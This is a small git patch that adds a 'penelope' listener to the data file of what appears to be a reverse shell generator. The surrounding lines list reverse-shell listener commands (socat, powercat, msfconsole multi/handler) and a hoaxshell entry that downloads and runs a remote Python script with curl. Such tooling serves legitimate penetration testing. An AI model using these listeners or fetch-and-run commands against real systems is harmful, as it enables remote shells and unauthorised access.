From 15241fb8f264ccc83388f24c0ebeccdb41271487 Mon Sep 17 00:00:00 2001 From: brightio Date: Mon, 22 Jun 2026 21:53:09 +0300 Subject: [PATCH] Add Penelope to the available listener commands --- js/data.js | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/js/data.js b/js/data.js index 8900989..4d631fb 100644 --- a/js/data.js +++ b/js/data.js @@ -751,7 +751,8 @@ const rsgData = { ['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'], ['powercat', 'powercat -l -p {port}'], ['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"'], - ['hoaxshell', 'python3 -c "$(curl -s https://raw.githubusercontent.com/t3l3machus/hoaxshell/main/revshells/hoaxshell-listener.py)" -t {type} -p {port}'] + ['hoaxshell', 'python3 -c "$(curl -s https://raw.githubusercontent.com/t3l3machus/hoaxshell/main/revshells/hoaxshell-listener.py)" -t {type} -p {port}'], + ['penelope', 'penelope -p {port}'] ], shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'pwsh', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh', 'mksh', 'dash'],